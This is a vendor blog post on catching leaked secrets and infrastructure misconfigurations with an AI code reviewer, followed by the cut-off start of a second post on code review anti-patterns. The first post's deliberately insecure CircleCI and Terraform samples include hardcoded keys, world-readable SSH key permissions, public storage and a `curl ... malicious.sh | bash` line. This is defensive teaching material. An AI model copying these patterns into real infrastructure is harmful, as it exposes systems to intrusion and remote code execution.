As technology accelerates at breakneck speed, integrating security into the development process has become paramount, especially following [GitLab's recent release of critical updates addressing 17 vulnerabilities, one of which carries a CVSS score of 9.6.](https://www.developer-tech.com/news/gitlab-update-addresses-pipeline-execution-vulnerability/) As Ray Kelly from Synopsys Software Integrity Group aptly points out, mentioning vulnerabilities in development workflows can be alarming.

The "shift-left" approach integrates security earlier in development, complicating CI/CD workflows and adding pressure on developers. This often leads to frustration and potential bottlenecks in the development process. SecOps teams play a crucial role in managing security without disrupting progress, particularly concerning the exposure of secrets like API keys, which are often caused by automation and misconfigurations.

In this post, we'll explore how CodeRabbit can help by automatically reviewing configuration files in your codebase. It identifies potential issues early in the pipeline, ensuring your infrastructure configurations are secure while allowing development to move quickly and efficiently.

## Why Secret Detection and IaC Scanning are Essential

Organizations must prioritize robust security measures in the wake of increasing cyber threats, particularly highlighted by incidents like the [SolarWinds attack, where hackers inserted malicious code into a widely used software update](https://about.gitlab.com/blog/2021/08/18/what-the-solarwinds-attack-can-teach-us-about-devsecops/). This incident underscores vulnerabilities in the software supply chain, affecting many organizations. Automated security solutions such as Secret Detection and Infrastructure as Code (IaC) scanning have emerged as vital tools helping teams to proactively identify vulnerabilities that could lead to unauthorized access and data breaches.
### Prevent Unauthorized Access to Systems and Data

Secret Detection is vital for preventing unauthorized access to critical systems and sensitive data by identifying hardcoded secrets and credentials within codebases. For example, in 2016, [Uber suffered a significant breach](https://www.trendmicro.com/vinfo/ph/security/news/cybercrime-and-digital-threats/uber-breach-exposes-the-data-of-57-million-drivers-and-users) when attackers accessed a private GitHub repository and discovered hardcoded AWS credentials. This oversight allowed them to steal personal data from 57 million riders and drivers, emphasizing the critical need for vigilant secret management to protect user data.

### Avoid Misconfigurations that Create Security Vulnerabilities

IaC scanning is essential for identifying insecure configurations in cloud infrastructure, helping teams avoid misconfigurations that can expose systems to threats. In a [recent incident](https://unit42.paloaltonetworks.com/large-scale-cloud-extortion-operation/), Palo Alto Networks discovered that threat actors had compromised 110,000 domains by exploiting exposed environment variable files containing sensitive information like AWS access keys.

### Protect Sensitive Data from Accidental Exposure

Secret Detection tools help ensure that sensitive data, such as passwords and personal information, is not inadvertently exposed in logs or code. A recent example involved [Sourcegraph, where an access token was mistakenly published in a public code commit](https://www.bleepingcomputer.com/news/security/sourcegraph-website-breached-using-leaked-admin-access-token/). This token had broad privileges, allowing attackers to create new accounts and gain access to the admin dashboard.

### Ensure Compliance with Security Policies and Regulations

Automated scanning tools assist organizations in adhering to security policies and regulations by flagging non-compliant configurations.
For example, companies in regulated industries can implement [Open Policy Agent](https://github.com/open-policy-agent/opa) (OPA) or [Kyverno](https://github.com/kyverno/kyverno) rules to enforce organizational policies proactively. CodeRabbit, for instance, can run [Regal](https://docs.coderabbit.ai/tools/regal/), a linter for Rego policies, to help enforce rules and ensure compliance. By using IaC scanning, organizations ensure their infrastructure configurations meet regulatory standards, avoiding potential fines and legal complications.

### Reduce the Risk of Unsecured Cloud Resources

IaC scanning can identify unsecured cloud resources, such as overly permissive security groups or exposed endpoints. A [report](https://www.darkreading.com/vulnerabilities-threats/exposed-container-orchestration-systems-putting-many-orgs-at-risk) states, “A significant risk was highlighted when organizations misconfigured cloud environments, allowing public access to critical data without proper security measures.” You can find many such misconfigured environments on [Shodan](https://www.shodan.io/). Proactive scanning can reveal these vulnerabilities before they are exploited, preventing potential downtime and reputational damage.

## Challenges in CI/CD Pipelines Related to Security

As organizations increasingly adopt automated security measures like Secret Detection and Infrastructure as Code (IaC) scanning, it’s essential to recognize the challenges that still persist within CI/CD pipelines. While these tools enhance security, they also highlight the complexities of maintaining a secure development environment.

### High Frequency of Changes Increases Risk Exposure

The rapid pace of development in CI/CD pipelines leads to frequent and substantial code changes, each of which creates an opportunity for a security vulnerability to slip in. For example, companies like AWS deploy code updates approximately every 20 seconds, highlighting the need for continuous monitoring to ensure security.
This dynamic environment necessitates continuous vigilance to ensure that new code does not compromise existing security measures.

### Manual Code Reviews are Time-Consuming and Error-Prone

While manual code reviews are essential for identifying security flaws, they can be labor-intensive and prone to human error. As the volume of code increases, the likelihood of missing critical vulnerabilities also rises, making this method increasingly unreliable. [The October 2021 Facebook outage](https://riskledger.com/resources/facebook-outage) exemplifies how oversights can compromise system integrity, particularly when under pressure to implement rapid changes. The incident was caused by a “configuration change” in the system managing Facebook's global backbone network capacity, which led to a complete disconnection of server connections between their data centers and the internet.

### Integrating Security Checks Without Slowing Down the Pipeline

Incorporating security checks into CI/CD pipelines is necessary but can lead to bottlenecks if not done efficiently. Teams must find a balance between thorough security assessments and maintaining the speed of the development cycle. Striking this balance is crucial for ensuring that security does not hinder innovation and productivity.

## Using CodeRabbit for Secret Detection and IaC Scanning

Effective solutions become essential as companies tackle the complexities and challenges of sustaining security in CI/CD pipelines, particularly with increasing vulnerabilities and rapid development cycles.

Given these pressing needs, CodeRabbit serves as an AI-powered code review tool that analyzes configuration files to identify issues and check them against best practices and compliance requirements. It provides real-time, context-aware feedback, helping developers streamline workflows and enhance code quality without the complexity of traditional security tools.
By integrating with tools like Checkov, Yamllint, and Gitleaks, CodeRabbit strengthens development security, helping teams identify vulnerabilities quickly and suggesting fixes for them.

* [Checkov](https://docs.coderabbit.ai/tools/checkov): Scans Infrastructure as Code templates for misconfigurations, ensuring that cloud resources are set up securely.
* [Yamllint](https://docs.coderabbit.ai/tools/yamllint): Checks YAML files for syntax errors and adherence to best practices, vital for maintaining operational integrity.
* [Gitleaks](https://docs.coderabbit.ai/tools/gitleaks): Identifies hardcoded secrets within Git repositories, preventing accidental exposure of sensitive information such as passwords and API keys.

Simply enabling these tools in CodeRabbit’s configuration automates Infrastructure as Code (IaC) scanning, making security an integral part of your development process. Let’s see how it employs these for automated reviews in IaC scanning.

## Securing CircleCI Deployments with CodeRabbit

To demonstrate how CodeRabbit detects secrets and security issues, we deliberately introduced problems into our CircleCI setup, such as incorrect configurations and leaked secrets.

Before running the tests, we [configured CodeRabbit in our repository](https://coderabbit.ai/blog/how-to-integrate-ai-code-review-into-your-devops-pipeline) using a straightforward two-click setup. CodeRabbit then identifies potential security risks in real time.

Upon submitting a pull request, it automatically reviews the file and generates a structured report with the following key sections:

* **Summary**: An overview of the key changes detected, highlighting areas that need attention.
* **Walkthrough**: A step-by-step analysis of the reviewed files, detailing specific issues and recommendations.
* **Table of Changes**: A table listing all changes in each file along with a change summary for prioritization.
![](https://victorious-bubble-f69a016683.media.strapiapp.com/d75325a36551f8a2fc0dde66b065dc3be53b7761a1cd9b3d2c7439b82b06e1e5_17bffc00af.png)

![](https://victorious-bubble-f69a016683.media.strapiapp.com/5a9ae7c10de864a2ec6b04f3d0011a9bacde2b85ab556014d97d9e98ea63c21a_26daef471c.png)

Here is a diagram illustrating the sequence of tasks in the CircleCI configuration file we created.

![](https://victorious-bubble-f69a016683.media.strapiapp.com/eeaf91d2e6068fd8c2416d03b14779860756da867939cfc291355ea7d7d53890_a652263814.png)

Here’s the sample `config.yml` file that we will use to demonstrate how CodeRabbit identifies potential misconfigurations and exposed secrets and recommends fixes that improve the security and reliability of your code.

```yaml
version: 2.1

executors:
  python-executor:
    docker:
      - image: circleci/python:3.8
    working_directory: ~/expense_tracker

jobs:
  lint:
    executor: python-executor
    steps:
      - checkout
      - run:
          name: Install Node.js
          command: |
            curl -fsSL https://deb.nodesource.com/setup_18.x | sudo -E bash -
            sudo apt-get install -y nodejs
      - run:
          name: Lint JavaScript code
          command: npm run lint

  yaml_lint:
    docker:
      - image: circleci/python:3.8
    steps:
      - checkout
      - run:
          name: Install YAMLlint
          command: |
            sudo apt-get update
            sudo apt-get install -y npm
            sudo npm install -g yaml-lint
      - run:
          name: Lint YAML files
          command: |
            yaml-lint **/*.yaml || true

  gitleaks:
    docker:
      - image: zricethezav/gitleaks:v8.3.0
    steps:
      - checkout
      - run:
          name: Run Gitleaks
          command: |
            echo "AWS_SECRET_ACCESS_KEY=A9B8C7D6E5F4G3H2I1J0K9L8M7N6O5P4Q3R2S1" > app.py
            gitleaks detect --source . --report-format json --report-path gitleaks-report.json
            cat gitleaks-report.json

  build:
    executor: python-executor
    steps:
      - checkout
      - run:
          name: Install Node.js
          command: |
            curl -fsSL https://deb.nodesource.com/setup_18.x | sudo -E bash -
            sudo apt-get install -y nodejs
      - run:
          name: Install dependencies
          command: |
            echo '{"dependencies": {"express": "4.0.0"}}' > package.json
            npm install
      - run:
          name: Run tests
          command: npm test
      - run:
          name: Check for vulnerabilities
          command: npm audit --production

  checkov:
    docker:
      - image: bridgecrew/checkov:2.0.0
    steps:
      - checkout
      - run:
          name: Run Checkov
          command: |
            checkov --directory infrastructure

  terraform:
    executor: python-executor
    steps:
      - checkout
      - run:
          name: Install Terraform
          command: |
            curl -LO https://releases.hashicorp.com/terraform/1.5.0/terraform_1.5.0_linux_amd64.zip
            unzip terraform_1.5.0_linux_amd64.zip
            sudo mv terraform /usr/local/bin/
            terraform --version
      - run:
          name: Terraform init
          command: terraform init
          working_directory: infrastructure/
      - run:
          name: Terraform plan
          command: terraform plan
          working_directory: infrastructure/
      - run:
          name: Terraform apply (development)
          when: on_success
          command: terraform apply -auto-approve
          working_directory: infrastructure/
          environment:
            AWS_ACCESS_KEY_ID: $AWS_ACCESS_KEY_ID
            AWS_SECRET_ACCESS_KEY: $AWS_SECRET_ACCESS_KEY

  docker:
    executor: python-executor
    steps:
      - checkout
      - run:
          name: Login to AWS ECR
          command: |
            aws ecr get-login-password --region us-east-1 | docker login --username AWS --password-stdin $ECR_REGISTRY
      - run:
          name: Build and tag Docker image
          command: |
            IMAGE_TAG=$(echo $CIRCLE_SHA1 | cut -c1-7)
            docker build -t $ECR_REGISTRY/my-app:latest .
      - run:
          name: Push Docker image to AWS ECR
          command: |
            IMAGE_TAG=$(echo $CIRCLE_SHA1 | cut -c1-7)
            docker push $ECR_REGISTRY/my-app:$IMAGE_TAG

  deploy:
    executor: python-executor
    steps:
      - checkout
      - run:
          name: Deploy to Development
          when: << pipeline.parameters.deploy_to_development >>
          command: |
            echo "Deploying to development environment"
            chmod 777 ~/.ssh/id_rsa
      - run:
          name: Deploy to Staging
          when: << pipeline.parameters.deploy_to_staging >>
          command: |
            echo "Deploying to staging environment"
      - run:
          name: Deploy to Production
          when: << pipeline.parameters.deploy_to_production >>
          command: |
            echo "Deploying to production environment"

workflows:
  version: 2
  build_and_deploy:
    jobs:
      - lint
      - yaml_lint:
          requires:
            - lint
      - gitleaks:
          requires:
            - yaml_lint
      - build:
          requires:
            - gitleaks
      - checkov:
          requires:
            - build
      - terraform:
          requires:
            - checkov
      - docker:
          requires:
            - terraform
      - deploy:
          requires:
            - docker
```

Before getting into the review, here is a high-level overview of the CircleCI configuration file:

* Runs a single `build_and_deploy` workflow in which each job starts only after the previous one succeeds.
* Lints the JavaScript code to catch errors early in development.
* Lints the YAML files to check their syntax.
* Runs Gitleaks to detect hard-coded secrets in the codebase before deployment.
* Installs dependencies, executes tests to validate application functionality, and audits packages for known vulnerabilities.
* Scans the `infrastructure` directory with Checkov, then initializes, plans, and applies the Terraform configuration that provisions the cloud infrastructure.
* Builds and tags a Docker image for the application, pushing it to AWS Elastic Container Registry (ECR) for deployment.
* Deploys the application to different environments (development, staging, and production), with each deployment step gated by a pipeline parameter.
Having walked through the configuration file and its components, we will now explore each review given by CodeRabbit in detail.

### Code Review

![](https://victorious-bubble-f69a016683.media.strapiapp.com/188b9abba0e534d4a7ffb82eb9d60707aa4a447c1d654c174baa8914506bd0c1_f2bd2b9d64.png)

In the `gitleaks` job, it flagged a potential security risk in the `.circleci/config.yml` file due to the inclusion of a fake AWS secret key. If the key is accidentally committed, it could produce false positives or even create a security vulnerability. Another concern is printing the gitleaks report to the console, which could expose sensitive data in the CI logs.

It suggests removing the fake secret key and updating the configuration to handle the gitleaks report securely. Instead of printing the report to the console, it recommends storing it as an artifact so that sensitive information stays out of the logs.

![](https://victorious-bubble-f69a016683.media.strapiapp.com/3e2c5e89e9168394dd979a487a973a5132850bb2bceb86f1dd90795f84781f08_9e5901df42.png)

In the `yaml_lint` job, it identified two areas for improvement. The setup installs npm without first checking whether it is already available in the `circleci/python:3.8` image, which adds unnecessary work to every run. Additionally, the `|| true` at the end of the linting command means the job never fails, even when there are linting errors, so critical issues in the YAML files can go unnoticed.

To address these concerns, it suggests checking for npm's existence before installation and removing the `|| true` so that the job fails when linting errors occur. The updated configuration is more efficient and ensures that problems in YAML files are flagged during the CI process.
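The gitleaks finding described earlier in this section comes down to spotting secret-shaped strings in text. As a rough illustration of that idea only, here is a minimal TypeScript sketch of a regex-based scan. The rule names, the patterns, and the `scanForSecrets` function are assumptions made up for this example; they are not Gitleaks's actual rule set or CodeRabbit's implementation.

```typescript
// Toy secret scanner: a sketch of regex-based detection.
// The rules below are hypothetical and far simpler than what Gitleaks ships.
interface Finding {
  rule: string;  // name of the hypothetical rule that matched
  line: number;  // 1-based line number in the scanned text
  match: string; // the substring that triggered the rule
}

interface Rule {
  name: string;
  pattern: RegExp;
}

const RULES: Rule[] = [
  // AWS access key IDs commonly look like "AKIA" plus 16 uppercase letters or digits.
  { name: "aws-access-key-id", pattern: /AKIA[0-9A-Z]{16}/ },
  // A literal value (8+ characters) assigned with "=" to a name containing
  // SECRET, PASSWORD, or TOKEN. Values starting with "$" are treated as
  // variable references and skipped.
  {
    name: "secret-assignment",
    pattern: /[A-Z0-9_]*(SECRET|PASSWORD|TOKEN)[A-Z0-9_]*\s*=\s*["']?[^\s"'$]{8,}/i,
  },
];

function scanForSecrets(text: string): Finding[] {
  const findings: Finding[] = [];
  text.split("\n").forEach((lineText, index) => {
    RULES.forEach((rule) => {
      const result = rule.pattern.exec(lineText);
      if (result !== null) {
        findings.push({ rule: rule.name, line: index + 1, match: result[0] });
      }
    });
  });
  return findings;
}

// The first line mirrors the fake key written by the gitleaks job;
// the second is an environment reference and should not be flagged.
const sample = [
  'echo "AWS_SECRET_ACCESS_KEY=A9B8C7D6E5F4G3H2I1J0K9L8M7N6O5P4Q3R2S1" > app.py',
  "AWS_SECRET_ACCESS_KEY: $AWS_SECRET_ACCESS_KEY",
].join("\n");

console.log(scanForSecrets(sample));
```

A real scanner layers many more rules, entropy checks, and allowlists on top of this, which is why the article relies on Gitleaks rather than hand-written patterns.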
![](https://victorious-bubble-f69a016683.media.strapiapp.com/f9ed76d6174e5b59d6b20a60cce7f89cf44384b5aac00b10ca3e53def3dbc1e7_c80892f20e.png) In the build job, it has captured concerns with the current method of dynamically creating a `package.json` file. The file only includes a single dependency (express 4.0.0), which may not represent the project’s actual requirements, and this outdated version could introduce security vulnerabilities. To enhance this setup, it suggests including a complete `package.json` file in the repository rather than generating it on the fly. If dynamic creation is necessary, ensure all required dependencies are listed with updated versions. Additionally, using `npm ci` instead of `npm install` is recommended for more consistent and reliable builds in CI environments. ![](https://victorious-bubble-f69a016683.media.strapiapp.com/e54a9ae8389ad519e7cd0115301239a4b640d654644d93b4aeaab44c9bf1f072_1d85b3dee0.png) In the deploy job, it has flagged a significant security risk due to the overly permissive SSH key permissions set to 777. This level of access poses a critical vulnerability, potentially allowing unauthorized users to read or modify the SSH key. Additionally, the deployment steps for both staging and production environments are currently just placeholders. To address these issues, it suggests changing the SSH key permissions to a more restrictive setting, such as 600, which allows read and write access only for the owner. It also recommends implementing actual deployment steps for each environment to ensure proper deployment processes are followed, enhancing both security and functionality in the deployment workflow. Here’s a sample `main.tf` file provisioning AWS resources, including an EC2 instance, security group, S3 bucket, and RDS database. 
However, it contains critical security vulnerabilities, such as hardcoded AWS credentials, overly permissive security group rules, public access configurations, and insecure user data scripts, which could jeopardize the security and reliability of the infrastructure.

```hcl
provider "aws" {
  region     = "us-west-2"
  access_key = "AKIAIOSFODNN7EXAMPLE"
  secret_key = "wJalrXUtnFEMI/K7MDENG/bPxRfiCYEXAMPLEKEY"
}

resource "aws_instance" "web_server" {
  ami                = "ami-0c55b159cbfafe1f0"
  instance_type      = "t2.micro"
  security_group_ids = ["sg-12345678"]
  key_name           = "prod-key"

  user_data = <<-EOF
    #!/bin/bash
    echo "Sensitive data: password123" > /etc/secret.txt
    sudo curl http://example.com/malicious.sh | bash
  EOF

  tags = {
    Name = "production-web-server"
  }
}

resource "aws_security_group" "web_sg" {
  name_prefix = "web-sg-"
  description = "Web server security group"

  ingress {
    from_port   = 0
    to_port     = 65535
    protocol    = "tcp"
    cidr_blocks = ["0.0.0.0/0"]
  }

  egress {
    from_port   = 0
    to_port     = 65535
    protocol    = "udp"
    cidr_blocks = ["0.0.0.0/0"]
  }
}

resource "aws_s3_bucket" "app_data_bucket" {
  bucket = "my-app-data"
  acl    = "public-read-write"

  versioning {
    enabled = false
  }

  lifecycle_rule {
    id      = "data-cleanup"
    enabled = true

    expiration {
      days = 7
    }

    noncurrent_version_expiration {
      days = 1
    }
  }

  server_side_encryption_configuration {
    rule {
      apply_server_side_encryption_by_default {
        sse_algorithm = "AES256"
      }
    }
  }
}

resource "aws_rds_instance" "app_database" {
  identifier              = "app-db-instance"
  engine                  = "mysql"
  instance_class          = "db.t2.micro"
  allocated_storage       = 5
  username                = "admin"
  password                = "R@nd0mP@ss12345"
  publicly_accessible     = true
  backup_retention_period = 0
  multi_az                = false
}
```

Now, let's see how CodeRabbit catches potential vulnerabilities.
![](https://victorious-bubble-f69a016683.media.strapiapp.com/585c15049ec352c9ecffcab89238f89616fb65795c8c49a39232477cfd6f57d6_53ea5a1360.png) In the `main.tf` file, it has identified a significant security risk due to hardcoded AWS credentials in the provider configuration. Including `access_key` and `secret_key` directly in the code exposes sensitive information, creating a major vulnerability that could lead to unauthorized access to AWS resources. It suggests removing the hardcoded credentials and adopting a more secure approach, such as using environment variables or AWS IAM roles to mitigate this risk. Setting up AWS credentials securely by configuring the AWS CLI or utilizing IAM roles when deploying on AWS services will enhance security and protect your resources from unauthorized access. ![](https://victorious-bubble-f69a016683.media.strapiapp.com/ddd0d84a73ad73d650c3b7993406f870235ea008ccf0d65c92932a05101f1ebe_062127996b.png) In the `user_data` script, it has detected significant security risks associated with exposing sensitive data and executing untrusted scripts. Writing sensitive information, such as `password123`, to `/etc/secret.txt` can lead to unauthorized access. Additionally, executing a script from an untrusted source without validation severely threatens system integrity. To address these issues, it suggests removing the exposure of sensitive data and avoiding the execution of unverified scripts. ![](https://victorious-bubble-f69a016683.media.strapiapp.com/542d12bed602997bb2b722e5e93242500ea324c3814d3d6b385b54a8c58b0705_5ddcd0115d.png) In the `aws_s3_bucket` resource configuration, it has captured a significant security risk due to the use of `acl = "public-read-write"`. This setting makes the S3 bucket publicly accessible for both reading and writing, which can lead to unauthorized data access and modification. It suggests changing the ACL to a more restrictive setting, such as `private`, to enhance security. 
This adjustment will help protect the bucket from unauthorized access and ensure that only authorized users can read or write data to the S3 bucket. ![](https://victorious-bubble-f69a016683.media.strapiapp.com/d63dd959b4c923e63a7c7db4ab2fc2c35459e8af2b34ecbf4b9d65db3bf0021b_604e630f9c.png) In the RDS instance configuration, it has identified significant concerns regarding data durability due to `backup_retention_period = 0` and `multi_az = false`. With backups disabled, there is a risk of data loss, and the lack of multi-AZ deployment indicates that the database is not configured for high availability. To enhance data protection and availability, it suggests enabling automated backups by setting `backup_retention_period` to a value greater than zero, such as 7 days, and configuring `multi_az` to `true`. These changes will improve data durability and ensure better database availability. ![](https://victorious-bubble-f69a016683.media.strapiapp.com/e765297787c1aa784ca7c2739ce2ca9f65855a54ef8c0b52402b5602feeed0a1_2494acaa22.png) In the security group configuration, it has detected a significant security concern due to overly permissive rules. The current setup allows inbound TCP traffic on all ports from any IP address (0.0.0.0/0) and outbound UDP traffic on all ports, which can expose your instances to potential security threats. It suggests restricting the ingress and egress rules to only necessary ports and IP ranges to enhance security. For example, if only HTTP (port 80) and HTTPS (port 443) are required, the configuration should be updated to allow only those ports. Additionally, it is recommended to limit outbound traffic to only what is necessary, such as allowing all protocols but specifying restricted conditions. 
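To make the security group recommendation more concrete, the following TypeScript sketch shows the kind of rule an IaC policy check might apply: flag any ingress rule that is open to `0.0.0.0/0` unless it targets a single approved port. The `SgRule` type, the `ALLOWED_PUBLIC_PORTS` list, and `findOverlyPermissiveRules` are hypothetical names invented for this illustration; this is not how Checkov or CodeRabbit is implemented.

```typescript
// Sketch of an IaC-style policy check over security group rules.
// All names here are hypothetical and exist only for illustration.
interface SgRule {
  direction: "ingress" | "egress";
  fromPort: number;
  toPort: number;
  protocol: string;
  cidrBlocks: string[];
}

// Assumption: only HTTP and HTTPS should be reachable from anywhere.
const ALLOWED_PUBLIC_PORTS: number[] = [80, 443];

function findOverlyPermissiveRules(rules: SgRule[]): string[] {
  const problems: string[] = [];
  rules.forEach((rule, index) => {
    const openToWorld = rule.cidrBlocks.indexOf("0.0.0.0/0") !== -1;
    // This sketch only inspects ingress; egress would need its own policy.
    if (rule.direction !== "ingress" || !openToWorld) {
      return;
    }
    const singleAllowedPort =
      rule.fromPort === rule.toPort &&
      ALLOWED_PUBLIC_PORTS.indexOf(rule.fromPort) !== -1;
    if (!singleAllowedPort) {
      problems.push(
        "rule " + index + ": " + rule.protocol + " ports " +
        rule.fromPort + "-" + rule.toPort + " open to 0.0.0.0/0"
      );
    }
  });
  return problems;
}

// The first rule mirrors the ingress block from main.tf; the second is the
// narrower HTTPS-only alternative suggested in the review.
const sampleRules: SgRule[] = [
  { direction: "ingress", fromPort: 0, toPort: 65535, protocol: "tcp", cidrBlocks: ["0.0.0.0/0"] },
  { direction: "ingress", fromPort: 443, toPort: 443, protocol: "tcp", cidrBlocks: ["0.0.0.0/0"] },
];

console.log(findOverlyPermissiveRules(sampleRules));
```

Only the all-ports rule is reported here, which matches the intent of the review: keep public exposure limited to the ports the service actually needs.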
![](https://victorious-bubble-f69a016683.media.strapiapp.com/0cd26501d72f0ae22a8a924001dda6fd6b06b45430be4fd995b404c8d1a003d4_c07369b6ad.png)

In the RDS instance configuration, it detected significant security risks associated with hardcoded database credentials and the setting `publicly_accessible = true`. The hardcoded password exposes sensitive information, and public accessibility increases the risk of unauthorized access to the database.

To mitigate these risks, it suggests using AWS Secrets Manager or Parameter Store to manage database credentials securely. Additionally, setting `publicly_accessible = false` restricts direct public access to the database. The configuration should also be updated to use variables for the username and password, ensuring they are defined securely.

By flagging both security risks and configuration improvements, CodeRabbit surfaces the critical issues that need fixing before deployment.

## How CodeRabbit Improves Security and Reliability in CI/CD Pipelines

### Enhanced Security

It boosts security by automating secret detection and Infrastructure as Code (IaC) scanning, reducing the risk of exposing sensitive information like API keys and credentials. For instance, CodeRabbit identified hardcoded AWS credentials in the Terraform file above. Reviewing every pull request allows security misconfigurations to be identified before deployment.

### Increased Reliability

Integrating security checks into the CI/CD pipeline ensures vulnerabilities and errors are caught early in development, leading to more stable software releases. Automated scans for secret detection and IaC misconfigurations reduce reliance on manual reviews. As seen, CodeRabbit flagged overly permissive security group rules, enabling prompt issue resolution.

### Faster Feedback Loop

It provides near-instant feedback to developers during code reviews, detecting potential security issues as they arise.
This rapid feedback allows for quick remediation, ensuring vulnerabilities are addressed without interrupting the development flow. Real-time security insights let developers act quickly while keeping continuous integration moving.

### Cost Efficiency

Catching security issues early helps organizations avoid costs associated with data breaches, incident response, and legal penalties for non-compliance. For example, it identified vulnerabilities that could lead to significant operational expenses if left unchecked. Its proactive approach reduces expenses linked to incident response and reputational damage.

## Summary

[Secret Detection and Infrastructure as Code (IaC)](https://docs.coderabbit.ai/tools/#supported-tools) scanning are central to maintaining the security and reliability of CI/CD pipelines. By identifying vulnerabilities and misconfigurations, teams can significantly reduce the risk of security breaches and ensure that sensitive data remains protected. Integrating these practices into your development process is essential for fostering a security culture within your organization.

[CodeRabbit](https://coderabbit.ai) is a code review tool that enhances your security posture by automating the analysis of your codebase's configuration files. Its ability to identify vulnerabilities and misconfigurations helps your infrastructure and deployment settings adhere to best practices, reducing the risk of security breaches. Streamlining the code review process for configuration files allows developers to maintain high security standards without sacrificing efficiency.

[Sign up](https://app.coderabbit.ai/login?free-trial) today to discover how CodeRabbit can transform your code reviews and strengthen your DevOps security efforts.

5 Code Review Anti-Patterns You Can Eliminate with AI

Desmond Obisi — Fri, 08 Nov 2024 00:00:00 GMT

Have you ever let a bug slip through because the pull request was too big to review properly? That's a typical anti-pattern. Trying to review a massive chunk of code in one go often leads to mistakes slipping through the cracks. Breaking it into smaller, manageable parts would save you the headache later.

[Code reviews](https://coderabbit.ai/blog/code-reviews-made-easy-how-to-improve-code-quality) should keep your code clean, understandable, and easy to maintain. But sometimes **bad habits known as anti-patterns** creep in. These common practices seem helpful but slow you down, hurt code quality, make your code harder to maintain, introduce bugs, and frustrate your team.

In this guide, you’ll learn about the most common anti-patterns that pop up during code reviews and how to tackle them with artificial intelligence (AI).

## The Most Common Anti-Patterns in Software Development

Anti-patterns exist in every programming language, and in contrast to best practices, they are highly counterproductive, steal valuable time, and lead to errors. These are some of the most common anti-patterns you’ll encounter in software engineering during code reviews:

**God Class (Or God Object)**

A “God Class” happens when you create a class that takes on too many responsibilities. You end up relying on one class to handle multiple tasks that should be broken down into smaller, more focused classes. The result is a bloated, hard-to-maintain class where making changes in one place leads to unintended consequences elsewhere. This structure often introduces bugs, code duplication, and technical debt.

![](https://victorious-bubble-f69a016683.media.strapiapp.com/d054fe1085724d776b06ebd88d3666221072542409f03cf2ad8943ab473f8f8c_2e9977cffd.png)

**Spaghetti Code**

Spaghetti code happens when your code’s structure becomes so twisted and tangled that it’s nearly impossible to follow.
This kind of code is difficult to review and maintain, whether due to excessive branching, deeply nested loops, or relying too much on global variables. It leads to longer review cycles, makes debugging harder, and can introduce new bugs through hidden dependencies. Here’s a sample of spaghetti code from a Go codebase that shows how things can spiral out of control. ![](https://victorious-bubble-f69a016683.media.strapiapp.com/fbe01063019f28c20e642945bbcd551f5f0fd58f09dd90fde303e27688495987_bec828a198.png) **Nit-Picking and Style Feedback** Another common anti-pattern you might run into is spending too much time on minor style issues during code reviews, such as formatting or naming conventions. While consistency matters, spending too much time on trivial style concerns can distract you from the core review and waste everyone’s time. Your reviews should prioritize functionality, architecture, and logic, leaving formatting to automated tools or final touch-ups. Here is a good example in a JavaScript codebase of how this anti-pattern can occur in your software development process: ![](https://victorious-bubble-f69a016683.media.strapiapp.com/66f4445fcbbbb6795d5a21a2a344ba1f299e402eb1694f5a90f60eaf4a6abba1_61ffc0e87e.png) **Primitive Obsession** Primitive obsession happens when you use simple data types like strings, integers, or booleans to represent more complex concepts. This makes the code harder to read, understand, and extend. You lose the rich meaning behind these values, making it challenging for others to work with your code later. Not only does this make future changes harder due to a lack of type safety and validation, but you also add to your technical debt. You’ll likely have to revisit that code to refactor it down the line. Here’s an example of how this anti-pattern can show up in a Rust codebase. 
![](https://victorious-bubble-f69a016683.media.strapiapp.com/bef0d71fdc5b7506b3c30361f283861e11b12d24b1cb243b1fd09b5556f3c9a6_f35715eb2b.png) **Shotgun Surgery** Shotgun surgery is an anti-pattern where a single change to your codebase requires modifications to many different parts of the codebase. This often indicates that the responsibilities are not well-distributed across the system, leading to tightly coupled code that's difficult to maintain and extend. Shotgun surgery complicates maintenance by requiring changes in multiple places, increasing the risk of bugs, reducing code reusability and modularity, and making updates more time-consuming with a higher chance of inconsistencies. The code snippets below show how shotgun surgery anti-pattern is formed in a Go codebase: In this example, to add a tracking functionality to this email-sending service, you will have to update the **Email** structure. ![](https://victorious-bubble-f69a016683.media.strapiapp.com/a1eca498a76d84f8a280d5d10162fb2d94d356ac6b143b77c4bb373ea1ca8373_323a01e179.png) You will also need to update the logic itself: ![](https://victorious-bubble-f69a016683.media.strapiapp.com/d022a4eaed0e5202b8a1dd515b58f702871721a643f4001f7dd9ab3ac47c7e37_5301ad9656.png) Next, you will have to update the tasks handler: ![](https://victorious-bubble-f69a016683.media.strapiapp.com/dabf1b325b84f57620a4856d75be222640d91644e3e134c193d4881358370057_bf3cfcf91a.png) Finally, in the demo function, you will use the email service. This roundtrip that affects multiple files while making a little change is what gives rise to the shotgun surgery anti-pattern. ![](https://victorious-bubble-f69a016683.media.strapiapp.com/29746023e6c789b0ac57f7ea3385a168f118e6a3d420277f8262c964939ca21b_83ed56764d.png) The following section shows how an AI tool like [CodeRabbit](https://coderabbit.ai/) can help you identify and resolve these anti-patterns in code reviews. 
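Before moving on, here is a rough TypeScript sketch of one way to soften the shotgun surgery problem described above: route cross-cutting behavior such as tracking through a single hook instead of editing the data structure, the sending logic, and the handlers separately. The `Email`, `EmailHook`, `EmailService`, and `withTracking` names are hypothetical and the URL is a placeholder; this is not a translation of the Go code in the screenshots.

```typescript
// Hypothetical types for illustration only.
interface Email {
  to: string;
  subject: string;
  body: string;
}

// A hook receives an email and returns a (possibly modified) copy.
type EmailHook = (email: Email) => Email;

class EmailService {
  private hooks: EmailHook[] = [];
  readonly sent: Email[] = [];

  // Register a cross-cutting behavior in exactly one place.
  use(hook: EmailHook): EmailService {
    this.hooks.push(hook);
    return this;
  }

  // Apply every registered hook in order, then "send" (here: record) the result.
  send(email: Email): Email {
    let current = email;
    this.hooks.forEach((hook) => {
      current = hook(current);
    });
    this.sent.push(current);
    return current;
  }
}

// Tracking lives in one function; example.com is a placeholder host.
const withTracking: EmailHook = (email) => ({
  to: email.to,
  subject: email.subject,
  body:
    email.body +
    '\n<img src="https://example.com/pixel.gif?to=' +
    encodeURIComponent(email.to) +
    '">',
});

const service = new EmailService().use(withTracking);
const delivered = service.send({ to: "dev@example.com", subject: "Hi", body: "Hello" });
console.log(delivered.body);
```

With this shape, adding or removing tracking touches only the line that registers the hook, while callers and the `Email` type stay unchanged. Whether a hook, a decorator, or plain composition fits best depends on the codebase.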
## How to Eliminate Anti-Patterns in Code Reviews With CodeRabbit

